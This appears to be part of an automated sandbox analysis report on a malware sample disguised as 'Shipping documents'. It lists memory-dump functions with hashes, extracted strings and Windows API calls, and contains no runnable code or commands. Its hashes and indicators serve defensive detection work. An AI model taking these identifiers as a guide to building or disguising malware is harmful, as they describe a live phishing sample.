Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2da5c9306c156994d84c62284bd2ba9fe09f1e988b28e3ed94904958a6948e5
Instruction ID: 0d6e04bcac4fd6d57bafdf46b5a79380d66b308f79fd973960daf373a41d26ad
Opcode Fuzzy Hash: e2da5c9306c156994d84c62284bd2ba9fe09f1e988b28e3ed94904958a6948e5
Instruction Fuzzy Hash: 5353F631D10B1A8ADB11EF68C8946A9F7B1FF99300F51D79AE05877121EB70AAD4CF81

Function 388D2370 Relevance: 1.0, Instructions: 1039COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8795ecb2af88c976c2418f46bda555464dcc04d22d9fa2bde5a06e4e50be0194
Instruction ID: 4321b10703e4a090b858a4055524aee95dea6ae8e02c6a1ae5de89d030e5a782
Opcode Fuzzy Hash: 8795ecb2af88c976c2418f46bda555464dcc04d22d9fa2bde5a06e4e50be0194
Instruction Fuzzy Hash: C4920538A00204CFDB24DF68C584B89B7F2EB49314F5585A9D409AB766DB75EC8ACF50

Function 388D66C0 Relevance: .8, Instructions: 819COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d678ee04cc8addd78d9f6955c6e340ad6b7911f68b411e625da4f0cb5345bcbe
Instruction ID: 42ad26ec18b6ea8c7ec1d2960caf1757b5d080a3f911ee28442a93f8eddb09d6
Opcode Fuzzy Hash: d678ee04cc8addd78d9f6955c6e340ad6b7911f68b411e625da4f0cb5345bcbe
Instruction Fuzzy Hash: 1F628B34A00208CFEB14EF68D544A9DB7F2EF88354F648529E815EB795DB35EC4ACB80

Function 388DC240 Relevance: .6, Instructions: 639COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52b3388035de37513fcaf9dbf390a734f5fbd10d56fb4d5b717b3c4a72525b9
Instruction ID: 81820b293ba6df1a530bfcc71c00e6cb1fd4633a43560e912e08a98ab7564a1f
Opcode Fuzzy Hash: d52b3388035de37513fcaf9dbf390a734f5fbd10d56fb4d5b717b3c4a72525b9
Instruction Fuzzy Hash: A432AE34B00249DFEB14DB68D980A9EB7B3FB88350F508529E515EB395DB34EC4ACB91

Function 388D56A0 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef52c953a886d82f49eaa9d8c0aef246a92a7ecd79cd06ba717c9e6e29cdcde
Instruction ID: 2e96cd8bfe712b50f8dbd8909b0066e0b08c5040d34a67d92ef88b919cd179e3
Opcode Fuzzy Hash: 4ef52c953a886d82f49eaa9d8c0aef246a92a7ecd79cd06ba717c9e6e29cdcde
Instruction Fuzzy Hash: 6D12F235F01205DFEB14DF64D88069EB7B2EB84324F20843AD85AEB785DA34DD4ACB91

Function 388DB2F0 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc543a058d860333e07bd9c42b05d07572e9bfa64de9d5147b9c2e658f42feba
Instruction ID: 52812ac9fc4d84db71180e71c11ceac0667ad839c6bb794dee717d49bdbdb3d2
Opcode Fuzzy Hash: fc543a058d860333e07bd9c42b05d07572e9bfa64de9d5147b9c2e658f42feba
Instruction Fuzzy Hash: CD22A174E00209CFEB14CF6DC590B9DB7B6EB49350F608926E419EB792DA34DC8ACB51

Function 0016A214 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3746e3f03dd438c933c39e910333d29dab8afc21e6ef3a87aaf0c9ff27645e6
Instruction ID: 25a664c7075f026a68a448d8a96e8afcfc54bbb5dd31bc014c08e06757c41489
Opcode Fuzzy Hash: a3746e3f03dd438c933c39e910333d29dab8afc21e6ef3a87aaf0c9ff27645e6
Instruction Fuzzy Hash: D4D19E34A001058FDB18DFA8D994AADB7B2FF88314F648529E406EB365DB35DC56CF82

Function 00164A58 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9005718ba06e7ee970f061c101449e2d34b81474a9c1bfa33957cbc6bb14e00c
Instruction ID: 439745c52aacf8377c1d0ed953fa1deaa829092e1cb039e932114973b9038d38
Opcode Fuzzy Hash: 9005718ba06e7ee970f061c101449e2d34b81474a9c1bfa33957cbc6bb14e00c
Instruction Fuzzy Hash: 8BB14B70E00209CFDF14CFA9CD957ADBBF2AF88714F148129D819A7394EB7498A5CB85

Function 00163E40 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4593110bb0a44f5afedc4da9f9adfb6e4361879cb961c9273f782d690b760d
Instruction ID: 1ff94b49422a9336a2bf9279a1583ba74e4c845d9e40c640fc425ac102715989
Opcode Fuzzy Hash: dd4593110bb0a44f5afedc4da9f9adfb6e4361879cb961c9273f782d690b760d
Instruction Fuzzy Hash: D7918D70E00209DFDF14CFA9CD857EEBBF2AF88304F148129E415A7294EB749996CB91

Function 388DAD98 Relevance: 12.9, Strings: 10, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XM, xrefs: 388DB169
$]q, xrefs: 388DAF47
$]q, xrefs: 388DAF3B
$]q, xrefs: 388DAEC5
$]q, xrefs: 388DAF0C
XM, xrefs: 388DB24A
$]q, xrefs: 388DAF64
$]q, xrefs: 388DAEB9
$]q, xrefs: 388DAF70
$]q, xrefs: 388DAF18

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: XM$XM$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3131319162
Opcode ID: b43f8d53ec56a611b139261d5d6892862eb54dbe4352b9402993a85768412e12
Instruction ID: a0f7c7a9f85a832acd7bcc2836930edef73d47550896a7f312df87c8ce4ca6c1
Opcode Fuzzy Hash: b43f8d53ec56a611b139261d5d6892862eb54dbe4352b9402993a85768412e12
Instruction Fuzzy Hash: 86E18F74A00209CFDB19DF68D89069EB7B6FF84304F608629D419EB355DB35EC4ACB91

Function 388DB718 Relevance: 8.0, Strings: 6, Instructions: 468COMMON

Download Yara Rule

Strings

$]q, xrefs: 388DBC59
$]q, xrefs: 388DBCCD
$]q, xrefs: 388DBC99
$]q, xrefs: 388DBC8D
$]q, xrefs: 388DBCC1
$]q, xrefs: 388DBC65

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: fbb104f5edaea8ef449d340f453b9d2d8dc6502eb8e66c6b06e5abb40b435d1e
Instruction ID: a1c4a079cd58a8c240da40fa345ed22c886993c229f44965298ad667a5f34af9
Opcode Fuzzy Hash: fbb104f5edaea8ef449d340f453b9d2d8dc6502eb8e66c6b06e5abb40b435d1e
Instruction Fuzzy Hash: BA026C74A00209DFEB14CF6DC580A9DB7B2FF85354F20892AD419EB651DB34DD8ACB91

Function 37FE320C Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 37FE328E
GetCurrentThread.KERNEL32 ref: 37FE32CB
GetCurrentProcess.KERNEL32 ref: 37FE3308
GetCurrentThreadId.KERNEL32 ref: 37FE3361

Memory Dump Source

Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 18ac75e27e8f8005f38c6e243038fe5179570d5c34f917d4f06c0810966e9b87
Instruction ID: 1239e18fd3570af9e54b053dcecda5c6c0ce49465721ae87511c1f425e00419b
Opcode Fuzzy Hash: 18ac75e27e8f8005f38c6e243038fe5179570d5c34f917d4f06c0810966e9b87
Instruction Fuzzy Hash: BA5158B09002499FDB04DFAAC548BEEBBF5FF88310F248859D019A7361DB39A940CF65

Function 37FE3210 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 37FE328E
GetCurrentThread.KERNEL32 ref: 37FE32CB
GetCurrentProcess.KERNEL32 ref: 37FE3308
GetCurrentThreadId.KERNEL32 ref: 37FE3361

Memory Dump Source

Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 76cdd72f563371837edb952a66b9fe7e8f2ae100584ea5749a6a7a469fba11c5
Instruction ID: 2990d36025a5f5d8827268f19751a7971419ee9f00d4acc0ce36e8cceeee4f48
Opcode Fuzzy Hash: 76cdd72f563371837edb952a66b9fe7e8f2ae100584ea5749a6a7a469fba11c5
Instruction Fuzzy Hash: 8F5147B09002499FDB14DFAAD548BEEBBF5FF88310F248859D019A7361DB39A940CF65

Function 388D9210 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 388D928C
$]q, xrefs: 388D92BB
$]q, xrefs: 388D92C7
$]q, xrefs: 388D9280

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 9f615d149b3cb4fa4e82327e7ef8cf9e663c506784c0d710e6e2b502fc0131c4
Instruction ID: c0dd55872a222306390c822bfb299ac83be6717c8441ff9cb66d1d136d8fe5fd
Opcode Fuzzy Hash: 9f615d149b3cb4fa4e82327e7ef8cf9e663c506784c0d710e6e2b502fc0131c4
Instruction Fuzzy Hash: FA915E34B0020A8FDB55DF65C850BAEB3F7BF88244F508569C919EB354EA70AD478B92

Function 00169038 Relevance: 4.7, Strings: 3, Instructions: 940
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^v5, xrefs: 00169D29
[v5, xrefs: 00169A51
Qv5,Rv5PRv5`Ay5, xrefs: 00169075, 001690DC, 001692E5, 0016940C, 0016960A, 0016965F, 001697C1, 001698F6, 00169AD8, 00169B8E, 00169CFA, 00169DB0

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: Qv5,Rv5PRv5`Ay5$[v5$^v5
API String ID: 0-3177103823
Opcode ID: 3c74093c0954d574f7bc7e89bee7f47b34cf7106aa692e719c7987aaae778190
Instruction ID: 4b707bb9a775a7d4b844194a01db4541b22f33c7d1846699450cfec5879edce1
Opcode Fuzzy Hash: 3c74093c0954d574f7bc7e89bee7f47b34cf7106aa692e719c7987aaae778190
Instruction Fuzzy Hash: 99824974B002049FDB18EB24C991A6DB7A3EB8C714F50826ADA1AF7350DB35AC83CF55

Function 00169048 Relevance: 4.7, Strings: 3, Instructions: 934
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^v5, xrefs: 00169D29
[v5, xrefs: 00169A51
Qv5,Rv5PRv5`Ay5, xrefs: 00169075, 001690DC, 001692E5, 0016940C, 0016960A, 0016965F, 001697C1, 001698F6, 00169AD8, 00169B8E, 00169CFA, 00169DB0

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: Qv5,Rv5PRv5`Ay5$[v5$^v5
API String ID: 0-3177103823
Opcode ID: 1707fb263465ff4a1e7109aeedb2666f42c88c3a7c06ea2cffec510d61f73b8a
Instruction ID: 469692cd05ca7a5412c4d57e077b0ddb33c79f73c71d141dbe8b6d8164da6e9b
Opcode Fuzzy Hash: 1707fb263465ff4a1e7109aeedb2666f42c88c3a7c06ea2cffec510d61f73b8a
Instruction Fuzzy Hash: 5D824974B002049FDB18EB24C991A6DB7A3EB8C714F50816ADA1AF7350DB35AC83CF55

Function 388DD008 Relevance: 4.6, Strings: 3, Instructions: 805
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 388DD3FF
$]q, xrefs: 388DD407
$]q, xrefs: 388DD413

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: f6a58b049c7816f2a273957da75fd892eadaefd7ce078bfba3c0d8d564a0dbeb
Instruction ID: 0ee823d45e34a15aefd4c4cf9f7fb79f9417e12cf03f835882e1b36153abfbc9
Opcode Fuzzy Hash: f6a58b049c7816f2a273957da75fd892eadaefd7ce078bfba3c0d8d564a0dbeb
Instruction Fuzzy Hash: 5E622C3060020ACFDB15DF68D590A4DB7B6FF84344B608A29D41AEF269DB75ED4BCB81

Function 388D4C68 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Obq, xrefs: 388D4E43
fbq, xrefs: 388D4C93
XPbq, xrefs: 388D4DB9

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: fbq$XPbq$\Obq
API String ID: 0-4057264190
Opcode ID: 292945836a1c32994bb43390a0b5eb31f4d6765c1d160f808ffc2038185b4979
Instruction ID: ab887a206bed2b26333c3c23b6fda711336df238724100f0b2471454e26614c5
Opcode Fuzzy Hash: 292945836a1c32994bb43390a0b5eb31f4d6765c1d160f808ffc2038185b4979
Instruction Fuzzy Hash: DE617F30E002199FEB149FA5C8557AEBBF6FF88310F20852AE105AB395DB758D468F91

Function 0016F2C6 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0016F592
`Ay5, xrefs: 0016F41C

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: PH]q$`Ay5
API String ID: 0-976110911
Opcode ID: 9f4d72260317344f58072843ffc46c0aa4fae40cd6c921e193288453c3038f7e
Instruction ID: aeb860d3f9c1ec20c88e94c33163728bd853ba7f403c01c87e065092d1a602e5
Opcode Fuzzy Hash: 9f4d72260317344f58072843ffc46c0aa4fae40cd6c921e193288453c3038f7e
Instruction Fuzzy Hash: 2F71C031B002059FDB18AF68E8906AEB7A3FB88310F248579D406EB385DB35DD57CB91

Function 388D9200 Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

$]q, xrefs: 388D92BB
$]q, xrefs: 388D9280

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: ab2b6076a5d7620ca4bdd599deeaefccd3f0eeb1bb172572a82b08bbd412781a
Instruction ID: e1771594097d22a8a73615168205b2f231d64c9654ef3da1ff5f4b4e35d3abab
Opcode Fuzzy Hash: ab2b6076a5d7620ca4bdd599deeaefccd3f0eeb1bb172572a82b08bbd412781a
Instruction Fuzzy Hash: FC513E74B002059FDB55DF78C850B6EB3F7EB88744F508569C919EB395EA30AC078B92

Function 388D4C59 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

fbq, xrefs: 388D4C93
XPbq, xrefs: 388D4DB9

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: fbq$XPbq
API String ID: 0-2292610095
Opcode ID: 6043ce71b20a931aa6df61f31f62938ac6a2064cc77e10065dc54a484b83367d
Instruction ID: fd6fb89b24c4e6fdb9c1eb2181711cdf76f25119371278c24072ca42f5b40173
Opcode Fuzzy Hash: 6043ce71b20a931aa6df61f31f62938ac6a2064cc77e10065dc54a484b83367d
Instruction Fuzzy Hash: EB516E70F002099FEB149FA5C855BAEBBF6FF88700F208529E105AB395DB758D468F91

Function 0016A100 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

,Rv5PRv5`Ay5, xrefs: 0016A155
$, xrefs: 0016A109

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $$,Rv5PRv5`Ay5
API String ID: 0-1665853859
Opcode ID: 136ec9ab5b45baeb392469e3e4c27a405b949511fdf05b37e7e1a85861e079c0
Instruction ID: 9819114a53308e8839a706f75c0a1641a9e0fc8389eca12d28bb2b2061da7715
Opcode Fuzzy Hash: 136ec9ab5b45baeb392469e3e4c27a405b949511fdf05b37e7e1a85861e079c0
Instruction Fuzzy Hash: 4F318171E0020A9BDB09CF64D89069EF7B2FF8A304F54C629E815FB240DB709C96CB81

Function 37FED7E4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FED902

Memory Dump Source

Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fba12d948406bd1dea22724a58683ef7d3e70a7ecf45dd52263d2a90dd28a92d
Instruction ID: aaf012736a9263a84bd8f9af14768cc47f550a085f2b4f0be949ecce7bd912b1
Opcode Fuzzy Hash: fba12d948406bd1dea22724a58683ef7d3e70a7ecf45dd52263d2a90dd28a92d
Instruction Fuzzy Hash: EC51D2B5C00349DFDB14CF9AC884ADEBFB5BF48354F24852AE419AB210D775A985CF90

Function 37FED7F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FED902

Memory Dump Source

Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7d8757d7348c9bd5ff3d0b7a3fb31b85706785a402a2b7921e5d100bb23f0e87
Instruction ID: c8969c9237016b36fada912951e501ae490e6ee24aebf014a1468722e92462a9
Opcode Fuzzy Hash: 7d8757d7348c9bd5ff3d0b7a3fb31b85706785a402a2b7921e5d100bb23f0e87
Instruction Fuzzy Hash: F541BFB1D00309DFDB14CF9AC884ADEBBB5BF48310F64852AE819AB250D775A985CF91

Function 38CA0040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 38CA0101

Memory Dump Source

Source File: 00000004.00000002.3325209083.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38ca0000_Shipping documents 000293994900.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 52d56f2a3224afa32949bc44ed2101f935fc0cef4d3daae2a79808684586536a
Instruction ID: 42b907655c64762e4f0f72c61833d72822c3652e4e1631f43e93817a9c05525f
Opcode Fuzzy Hash: 52d56f2a3224afa32949bc44ed2101f935fc0cef4d3daae2a79808684586536a
Instruction Fuzzy Hash: B9411AB8A00305CFDB04CF99C888A9ABBF5FF89314F24C459D519A7321D779A841CFA0

Function 37FE3450 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37FE34DF

Memory Dump Source

Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 519088b1cbf0590ec4b584599eb050591b3b078c73b643d2de4b50cc083712ab
Instruction ID: 31cd7b55fef633e05fbe7b975d66094d72d71e48e7ea92b84084222d9e48404e
Opcode Fuzzy Hash: 519088b1cbf0590ec4b584599eb050591b3b078c73b643d2de4b50cc083712ab
Instruction Fuzzy Hash: 1521E5B5900209AFDB10CFAAD984ADEBBF9FF48310F14841AE915A7210D379A950CFA5

Function 37FE3458 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37FE34DF

Memory Dump Source

Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6ab8128baa819aaee27e1e12cba700083ac4cabbb6a0b3adaba4a66a458f7a18
Instruction ID: a79984710457d9973099c663c989d6fc8bff3b7ac3a2d7cd63ce0e15a774bc77
Opcode Fuzzy Hash: 6ab8128baa819aaee27e1e12cba700083ac4cabbb6a0b3adaba4a66a458f7a18
Instruction Fuzzy Hash: D221C4B59002499FDB10CFAAD984ADEBBF9FF48310F14841AE919A7350D379A940CFA5

Function 38CA2570 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 38CA25CD

Memory Dump Source

Source File: 00000004.00000002.3325209083.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38ca0000_Shipping documents 000293994900.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0470d9e33b627a00a06d7ea111e1699906f61d2bb2ac12aeaebf8b7419ec6c85
Instruction ID: 65e1c35b9d5b81581d42715e469667d20d191c859ebbb3faa469c56a471522ca
Opcode Fuzzy Hash: 0470d9e33b627a00a06d7ea111e1699906f61d2bb2ac12aeaebf8b7419ec6c85
Instruction Fuzzy Hash: FD1130B48002498FCB20DFAAD484BDEBFF4AB48314F20845AD459A3210C379A984CFA4

Function 38CA1780 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 38CA25CD

Memory Dump Source

Source File: 00000004.00000002.3325209083.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38ca0000_Shipping documents 000293994900.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 1c6dd314ac9b790950b8aa89ccd963488f468ef17b6443bc6a117de3adefe1a3
Instruction ID: 68d3349a383d7c73ebff7d9f893a3df14438ca82fa10a85d7cb56f487271ebe1
Opcode Fuzzy Hash: 1c6dd314ac9b790950b8aa89ccd963488f468ef17b6443bc6a117de3adefe1a3
Instruction Fuzzy Hash: D51112B59047498FCB20DFAAD584B9EBBF4FB48320F20845AE559A7310D379A940CFA5

Function 00167CA0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00167DDD

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 1e1273a61e8e6674d382d620a1db9d69e9a45f0d101237946be4519e2ff4a784
Instruction ID: a2862eabbee37b986e1224a99b1ab12da0e58d42594186c8bc2a1b6be3b708f9
Opcode Fuzzy Hash: 1e1273a61e8e6674d382d620a1db9d69e9a45f0d101237946be4519e2ff4a784
Instruction Fuzzy Hash: 64318170E142199FEF15CBA5CC507AEBBB1FF95308F20886AE406EB280E7759C56CB41

Function 388DDB7D Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

PH]q, xrefs: 388DDCD9

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 28f12188a2ce1f700012c99ba6bf694db512ce9bd7e54a83cf1d49d7040bbcfc
Instruction ID: a5bf5d6cf736458d3f633cd7150c9b219581311f15a405d0f855c59e664858d0
Opcode Fuzzy Hash: 28f12188a2ce1f700012c99ba6bf694db512ce9bd7e54a83cf1d49d7040bbcfc
Instruction Fuzzy Hash: 2741A070A00309DFEB05DF75C85469EBBB6FF85384F208929D405EB350EBB4994ACB91

Function 0016F480 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0016F592

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 7287d4f83a92cedef9328cdd50ce3513a7b17e4aac4193ad38ef9cf09d25271b
